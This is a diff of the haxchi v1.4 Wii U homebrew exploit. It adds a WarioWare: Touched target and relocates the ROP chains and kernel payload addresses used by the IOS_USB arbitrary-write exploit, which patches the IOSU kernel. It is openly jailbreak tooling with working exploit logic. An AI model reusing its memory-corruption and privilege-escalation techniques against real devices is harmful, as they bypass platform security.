merger haxchi v1.4

Makefile

@@ -1,5 +1,11 @@
 .PHONY := all code550.bin
 
+ifeq ($(Windows_NT), 1)
+	ZIP = zip/zip.exe
+else
+	ZIP = zip
+endif
+
 all: brainage kirby yoshids brainage.zip kirby.zip yoshids.zip brainage_cfw.zip kirby_cfw.zip yoshids_cfw.zip
 
 brainage: setup_brainage brainage.nds setup_brainage_cfw brainage_cfw.nds
@@ -52,6 +58,7 @@ yoshids.nds:
 	armips haxchi_rop.s
 	armips haxchi.s
 	mv rom.nds yoshids.nds
+	cp yoshids.nds wwtouched.nds
 
 brainage_cfw.nds:
 	armips haxchi_rop.s
@@ -67,28 +74,31 @@ yoshids_cfw.nds:
 	armips haxchi_rop.s
 	armips haxchi.s
 	mv rom.nds yoshids_cfw.nds
+	cp yoshids_cfw.nds wwtouched_cfw.nds
 
 brainage.zip:
-	zip -JXjq9 brainage.zip brainage.nds
+	$(ZIP) -JXjq9 brainage.zip brainage.nds
 
 kirby.zip:
-	zip -JXjq9 kirby.zip kirby.nds
+	$(ZIP) -JXjq9 kirby.zip kirby.nds
 
 yoshids.zip:
-	zip -JXjq9 yoshids.zip yoshids.nds
+	$(ZIP) -JXjq9 yoshids.zip yoshids.nds
+	$(ZIP) -JXjq9 wwtouched.zip wwtouched.nds
 
 brainage_cfw.zip:
-	zip -JXjq9 brainage_cfw.zip brainage_cfw.nds
+	$(ZIP) -JXjq9 brainage_cfw.zip brainage_cfw.nds
 
 kirby_cfw.zip:
-	zip -JXjq9 kirby_cfw.zip kirby_cfw.nds
+	$(ZIP) -JXjq9 kirby_cfw.zip kirby_cfw.nds
 
 yoshids_cfw.zip:
-	zip -JXjq9 yoshids_cfw.zip yoshids_cfw.nds
+	$(ZIP) -JXjq9 yoshids_cfw.zip yoshids_cfw.nds
+	$(ZIP) -JXjq9 wwtouched_cfw.zip wwtouched_cfw.nds
 
 clean:
-	@rm -f *.bin defines.s brainage.nds brainage.zip kirby.nds kirby.zip yoshids.nds yoshids.zip
-	@rm -f brainage_cfw.nds brainage_cfw.zip kirby_cfw.nds kirby_cfw.zip yoshids_cfw.nds yoshids_cfw.zip
+	@rm -f *.bin defines.s brainage.nds brainage.zip kirby.nds kirby.zip wwtouched.nds wwtouched.zip yoshids.nds yoshids.zip
+	@rm -f brainage_cfw.nds brainage_cfw.zip kirby_cfw.nds kirby_cfw.zip wwtouched_cfw.nds wwtouched_cfw.zip  yoshids_cfw.nds yoshids_cfw.zip
 	@cd cfw_booter && make clean && cd ..
 	@cd hbl_loader && make clean && cd ..
 	@echo "all cleaned up !"

README.md

@@ -16,8 +16,10 @@ of course, using wupclient to install haxchi permanently requires that redNAND b
 make sure to replace YOUR_GAME_TITLE_ID with one of the following:  
 10179B00 - US Brain Age  
 10179C00 - PAL Brain Training  
-10198A00 - US Yoshi's Island DS  
+10198900 - US Yoshi's Island DS  
 10198A00 - PAL Yoshi's Island DS  
+101A1F00 - US WarioWare: Touched  
+101A2000 - PAL WarioWare: Touched  
 101A5600 - US Kirby Squeak Squad  
 101A5700 - PAL Kirby Mouse Attack  
 

cfw_booter/Makefile

@@ -2,7 +2,7 @@ PATH := $(DEVKITPPC)/bin:$(PATH)
 PREFIX ?= powerpc-eabi-
 CC = $(PREFIX)gcc
 AS = $(PREFIX)gcc
-CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g
+CFLAGS = -std=gnu99 -O3 -nostdinc -fno-builtin
 ASFLAGS = -mregnames -x assembler-with-cpp
 LD = $(PREFIX)ld
 OBJCOPY = $(PREFIX)objcopy
@@ -37,7 +37,7 @@ main: $(CURDIR)/payload/arm_kernel_bin.h
 	cp -r $(root)/*.o $(build)
 	rm $(root)/*.o
 	$(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map
-	$(OBJCOPY) code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin
+	$(OBJCOPY) code$(FIRMWARE).elf -S -O binary ../code$(FIRMWARE).bin
 
 clean:
 	rm -rf $(build) payload

cfw_booter/arm_kernel/source/main.c

@@ -39,7 +39,6 @@ static const char os_launch_hook[] = {
 	0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e,
 };
 
-//static const char sd_path[] = "/vol/sdcard";
 static const char sd_path[] = "/vol/storage_mlc01/FW/";
 
 static unsigned int __attribute__((noinline)) disable_mmu(void)
@@ -71,7 +70,7 @@ int _main()
 	unsigned int control_register = disable_mmu();
 
 	/* Save the request handle so we can reply later */
-	*(volatile u32*)0x0012F000 = *(volatile u32*)0x1016AD18;
+	*(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18;
 
 	/* Patch kernel_error_handler to BX LR immediately */
 	*(int*)0x08129A24 = 0xE12FFF1E;
@@ -85,7 +84,7 @@ int _main()
 	void * pusb_root_thread = (void*)0x10100174;
 	kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread));
 
-	void * pUserBinSource = (void*)0x00148000;
+	void * pUserBinSource = (void*)0x01E50000;
 	void * pUserBinDest = (void*)0x101312D0;
 	kernel_memcpy(pUserBinDest, (void*)pUserBinSource, sizeof(arm_user_bin));
 

cfw_booter/arm_user/source/main.c

@@ -9,7 +9,7 @@ void _main()
 
 	int(*reply)(int, int) = (int(*)(int, int))0x1012ED04;
 
-	int saved_handle = *(volatile u32*)0x0012F000;
+	int saved_handle = *(volatile u32*)0x01E10000;
 	int myret = reply(saved_handle, 0);
 	if (myret != 0)
 		ios_shutdown(1);

cfw_booter/main.c

@@ -4,7 +4,7 @@
 #define CHAIN_START         0x1016AD40
 #define SHUTDOWN            0x1012EE4C
 #define SIMPLE_RETURN       0x101014E4
-#define SOURCE              (0x120000)
+#define SOURCE              0x01E20000
 #define IOS_CREATETHREAD    0x1012EABC
 #define ARM_CODE_BASE       0x08134100
 #define REPLACE_SYSCALL     0x081298BC
@@ -217,7 +217,7 @@ static const int final_chain[] = {
    sizeof(arm_kernel_bin),   // 0x1FC     our code size
    0x0,               // 0x200
    0x10123983,        // 0x204     POP {R1,R3,R4,R6,PC}
-   0x00140000,        // 0x208     our code source location
+   0x01E40000,        // 0x208     our code source location
    0x08131D04,        // 0x20C     KERNEL_MEMCPY address
    0x0,               // 0x210
    0x0,               // 0x214
@@ -233,7 +233,7 @@ static const int second_chain[] = {
    0x0,        // 0x08
    0x0,        // 0x0C
    0x101063db, // 0x10         POP {R1,R2,R5,PC}
-   0x00130000, // 0x14         source
+   0x01E30000, // 0x14         source
    sizeof(final_chain),          // 0x18         length
    0x0,        // 0x1C
    0x10106D4C, // 0x20         BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
@@ -283,22 +283,8 @@ static const int second_chain[] = {
 static void uhs_exploit_init(unsigned int coreinit_handle);
 static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val);
 
-void __main(void) {
-
-	unsigned int sound_handle = 0;
-	OSDynLoad_Acquire("sndcore2.rpl", &sound_handle);
-	if(sound_handle == 0)
-	{
-		/* Quit ongoing menu load music */
-		OSDynLoad_Acquire("snd_core.rpl", &sound_handle);
-		void (* AXInit)();
-		void (* AXQuit)();
-		OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit);
-		OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit);
-		AXInit();
-		AXQuit();
-	}
-
+void __main(void)
+{
 	unsigned int coreinit_handle;
 	OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
 	unsigned int sysapp_handle;
@@ -337,58 +323,65 @@ void __main(void) {
 	OSExitThread(0);
 }
 
-static void uhs_exploit_init(unsigned int coreinit_handle) {
-   void (*DCFlushRange)(const void *addr, uint32_t length);
-   void (*DCInvalidateRange)(const void *addr, uint32_t length);
+static void uhs_exploit_init(unsigned int coreinit_handle)
+{
+   void (*DCStoreRange)(const void *addr, uint32_t length);
    void (*memcpy)(void *dst, const void *src, uint32_t length);
-   OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
-   OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
+   void (*memset)(void *dst, const char val, uint32_t length);
+   OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "memcpy", &memcpy);
+   OSDynLoad_FindExport(coreinit_handle, 0, "memset", &memset);
+
+   //! Clear out our used MEM1 area
+   memset((void*)0xF5E00000, 0, 0x00070000);
+   DCStoreRange((void*)0xF5E00000, 0x00070000);
 
    //!------Variables used in exploit------
-   int *pretend_root_hub = (int*)0xF5003ABC;
-   int *ayylmao = (int*)0xF4F00000;
+   int *pretend_root_hub = (int*)0xF5E60640;
+   int *ayylmao = (int*)0xF5E00000;
    //!-------------------------------------
 
    ayylmao[5] = 1;
-   ayylmao[8] = 0xF00000;
+   ayylmao[8] = 0x1E00000;
 
-   memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
-   memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
-   memcpy((char*)(0xF4140000), arm_kernel_bin, sizeof(arm_kernel_bin));
-   memcpy((char*)(0xF4148000), arm_user_bin, sizeof(arm_user_bin));
+   memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain));
+   memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain));
+   memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin));
+   memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin));
 
-   pretend_root_hub[33] = 0xF00000;
+   pretend_root_hub[33] = 0x1E00000;
    pretend_root_hub[78] = 0;
 
-   DCFlushRange(pretend_root_hub + 33, 200);      //! |Make CPU fetch new data (with updated vals)
-   DCInvalidateRange(pretend_root_hub + 33, 200);   //! |for "pretend_root_hub"
+   //! Store current CPU cache into main memory for IOSU to read
+   DCStoreRange(ayylmao, 0x840);
+
+   DCStoreRange((void*)0xF5E20000, sizeof(second_chain));
+   DCStoreRange((void*)0xF5E30000, sizeof(final_chain));
+   DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin));
+   DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin));
 
-   DCFlushRange((void*)0xF4120000, sizeof(second_chain));      //! |Make CPU fetch new data (with updated vals)
-   DCFlushRange((void*)0xF4130000, sizeof(final_chain));      //! |Make CPU fetch new data (with updated vals)
-   DCFlushRange((void*)0xF4140000, sizeof(arm_kernel_bin));      //! |Make CPU fetch new data (with updated vals)
-   DCFlushRange((void*)0xF4148000, sizeof(arm_user_bin));      //! |Make CPU fetch new data (with updated vals)
+   DCStoreRange(pretend_root_hub, 0x160);
 }
 
-static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) {
-   void (*DCFlushRange)(const void *addr, uint32_t length);
-   void (*DCInvalidateRange)(const void *addr, uint32_t length);
+static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val)
+{
+   void (*DCStoreRange)(const void *addr, uint32_t length);
    void (*OSSleepTicks)(uint64_t ticks);
    int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len);
-   OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
-   OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
+   OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
    OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
 
    //!------Variables used in exploit------
-   int *ayylmao = (int*)0xF4F00000;
+   int *ayylmao = (int*)0xF5E00000;
    //!-------------------------------------
 
-   ayylmao[520] = arm_addr - 24;                  //!  The address to be overwritten, minus 24 bytes
-   DCFlushRange(ayylmao, 521 * 4);                //! |Make CPU fetch new data (with updated adress)
-   DCInvalidateRange(ayylmao, 521 * 4);           //! |for "ayylmao"
-   OSSleepTicks(0x200000);                        //!  Improves stability
-   int request_buffer[] = { -(0xBEA2C), val };      //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
+   ayylmao[520] = arm_addr - 24;                  //! The address to be overwritten, minus 24 bytes
+   DCStoreRange(ayylmao, 0x840);                  //! Store current CPU cache into main memory for IOSU to read
+   OSSleepTicks(0x200000);                        //! Wait for caches to refresh over in IOSU
+   //! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640,
+   //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1
+   int request_buffer[] = { -(0xB349B), val };
    int output_buffer[32];
    return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
 }

haxchi_rop.s

@@ -118,8 +118,10 @@ rop_hook_start:
 .arm.big
 
 rop_start:
-	; quit out of GX2 so we can re-use it in core 0
+	; do hachihachi cleanups so we can use everything safely
+	call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
 	call_func NERD_FASTWIIU_SHUTDOWN, 0, 0, 0, 0
+	call_func CORE_SHUTDOWN, 0, 0, 0, 0
 
 	; set up hbl_loader in core 0
 	call_func_6args NERD_CREATETHREAD, NERD_THREAD0OBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread0_param, 0x0, 0x0
@@ -198,10 +200,6 @@ rop_start:
 	call_func NERD_STARTTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
 	call_func NERD_JOINTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
 
-	; clean up the rest of hachihachi
-	call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
-	call_func CORE_SHUTDOWN, 0, 0, 0, 0
-
 	; prepare system for foreground release
 	call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0
 

hbl_loader/Makefile

@@ -2,7 +2,7 @@ PATH := $(DEVKITPPC)/bin:$(PATH)
 PREFIX ?= powerpc-eabi-
 CC = $(PREFIX)gcc
 AS = $(PREFIX)gcc
-CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g
+CFLAGS = -std=gnu99 -O3 -nostdinc -fno-builtin
 ASFLAGS = -mregnames -x assembler-with-cpp
 LD = $(PREFIX)ld
 OBJCOPY = $(PREFIX)objcopy
@@ -37,7 +37,7 @@ main: sd_loader.h
 	cp -r $(root)/*.o $(build)
 	rm $(root)/*.o
 	$(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map
-	$(OBJCOPY) code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin
+	$(OBJCOPY) code$(FIRMWARE).elf -S -O binary ../code$(FIRMWARE).bin
 
 clean:
 	rm -rf $(build)

hbl_loader/common.h

@@ -7,7 +7,7 @@ extern "C" {
 
 #include "os_defs.h"
 
-#define HBL_VERSION                 "v1.3"
+#define HBL_VERSION                 "v1.4"
 
 #define CAFE_OS_SD_PATH             "/vol/external01"
 #define SD_PATH                     "sd:"
@@ -19,11 +19,16 @@ extern "C" {
 
 #define ELF_DATA_ADDR               (*(volatile unsigned int*)(MEM_BASE + 0x1300 + 0x00))
 #define ELF_DATA_SIZE               (*(volatile unsigned int*)(MEM_BASE + 0x1300 + 0x04))
+#define HBL_CHANNEL                 (*(volatile unsigned int*)(MEM_BASE + 0x1300 + 0x08))
+#define RPX_MAX_SIZE                (*(volatile unsigned int*)(MEM_BASE + 0x1300 + 0x0C))
+#define RPX_MAX_CODE_SIZE           (*(volatile unsigned int*)(MEM_BASE + 0x1300 + 0x10))
 #define MAIN_ENTRY_ADDR             (*(volatile unsigned int*)(MEM_BASE + 0x1400 + 0x00))
 #define OS_FIRMWARE                 (*(volatile unsigned int*)(MEM_BASE + 0x1400 + 0x04))
 
 #define OS_SPECIFICS                ((OsSpecifics*)(MEM_BASE + 0x1500))
 
+#define MEM_AREA_TABLE              ((s_mem_area*)(MEM_BASE + 0x1600))
+
 #ifndef EXIT_SUCCESS
 #define EXIT_SUCCESS                0
 #endif

hbl_loader/kexploit.c

@@ -18,22 +18,13 @@ void run_kexploit(private_data_t *private_data)
 
 	/* Exit functions */
 	void (*__PPCExit)();
-	void (*_Exit)(int);
-
 	OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit);
-	OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
-
+
 	/* Memory functions */
 	void (*DCFlushRange)(void *buffer, uint32_t length);
-	void (*DCInvalidateRange)(void *buffer, uint32_t length);
-	void (*DCTouchRange)(void *buffer, uint32_t length);
-	uint32_t (*OSEffectiveToPhysical)(void *vaddr);
 	void* (*OSAllocFromSystem)(uint32_t size, int align);
 	void (*OSFreeToSystem)(void *ptr);
 	OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
-	OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
-	OSDynLoad_FindExport(coreinit_handle, 0, "DCTouchRange", &DCTouchRange);
-	OSDynLoad_FindExport(coreinit_handle, 0, "OSEffectiveToPhysical", &OSEffectiveToPhysical);
 	OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
 	OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);